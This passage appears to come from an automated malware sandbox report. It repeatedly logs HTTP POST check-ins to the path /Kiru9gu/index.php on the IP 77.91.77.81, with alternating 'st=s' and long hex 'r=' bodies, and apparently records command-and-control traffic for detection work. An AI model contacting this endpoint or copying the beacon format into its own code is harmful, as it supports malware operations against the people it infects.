r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
